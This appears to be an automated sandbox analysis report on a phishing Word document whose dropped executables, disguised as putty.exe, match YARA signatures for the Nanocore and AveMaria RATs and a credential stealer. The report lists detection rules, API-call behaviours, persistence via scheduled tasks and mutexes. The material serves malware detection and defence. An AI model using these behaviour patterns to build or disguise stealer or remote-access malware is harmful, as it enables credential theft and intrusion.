        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.24cdfa0.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.24cdfa0.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.d74c9f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.d74c9f.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 34.2.iBCrDCK.i.exe.d70000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 34.2.iBCrDCK.i.exe.d70000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000006.00000002.2096261364.00000000002C0000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000003.00000002.2094462607.0000000000160000.00000004.00000020.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
        Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2355684386.0000000002502000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2360227304.0000000003777000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
        Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: putty[1].exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: putty.exe.3.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: putty.exe.6.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: images.exe.13.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: putty[1].exe.0.dr, ValidationAndControl/TaskLaunch.cs | Task registration methods: 'Register'
        Source: putty.exe.3.dr, ValidationAndControl/TaskLaunch.cs | Task registration methods: 'Register'
        Source: putty.exe.6.dr, ValidationAndControl/TaskLaunch.cs | Task registration methods: 'Register'
        Source: 10.0.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.cs | Task registration methods: 'Register'
        Source: 10.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.cs | Task registration methods: 'Register'
        Source: 11.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.cs | Task registration methods: 'Register'
        Source: 11.0.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.cs | Task registration methods: 'Register'
        Source: 12.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.cs | Task registration methods: 'Register'
        Source: 12.0.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.cs | Task registration methods: 'Register'
        Source: images.exe.13.dr, ValidationAndControl/TaskLaunch.cs | Task registration methods: 'Register'
        Source: 13.2.putty.exe.100000.0.unpack, ValidationAndControl/TaskLaunch.cs | Task registration methods: 'Register'
        Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@45/31@24/2
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 11_2_005708A2 AdjustTokenPrivileges,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 11_2_0057086B AdjustTokenPrivileges,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 15_2_00410B38 OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,
        Source: C:\ProgramData\images.exe | Code function: 21_3_042394E0 GetVersionExW,MultiByteToWideChar,MultiByteToWideChar,_malloc,MultiByteToWideChar,_free,GetVersionExW,GetDiskFreeSpaceW,GetDiskFreeSpaceA,_free,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_0041405F RegSetValueExA,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_004148B6 CoInitialize,CoCreateInstance,VariantInit,CoUninitialize,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_00415169 LoadResource,SizeofResource,LockResource,GetTempPathA,GetTempPathA,lstrcatA,lstrcatA,GetTempPathA,lstrcatA,CreateFileA,WriteFile,CloseHandle,wsprintfA,ShellExecuteExA,
        Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 13_2_0040D33C OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,
        Source: C:\Users\user\AppData\Roaming\putty.exe | File created: C:\Program Files\Microsoft DN1
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$W PO1100372954 -.doc
        Source: C:\Windows\System32\drvinst.exe | Mutant created: \BaseNamedObjects\DrvInst.exe_mutex_{5B10AC83-4F13-4fde-8C0B-B85681BA8D73}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{6a1c2465-7ac5-4f1d-acc5-ef04fcf454c9}
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCDE9.tmp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#.........)...............................).....`I+........v.....................K2.....................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#..................j....................................}..v....(.......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../...............\..j....0.l.............................}..v............0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v..../..................j....p...............................}..v............0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.4.5.............}..v............0.................l.....$.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....;..................j....................................}..v....8.......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G...............\..j....0.l.............................}..v............0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....G..................j....................................}..v....8.......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S...............\..j....0.l.............................}..v............0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....S..................j....................................}..v....8.......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._.......s.e.r.s.\.A.l.b.u.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.p.u.t.t.y...e.x.e.'.........l.....J.......................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v...._..................j....................................}..v....p.......0.................l.............................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k...............\..j....0.l.............................}..v....8.......0...............................................
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....k..................j....................................}..v....p.......0.................l.............................
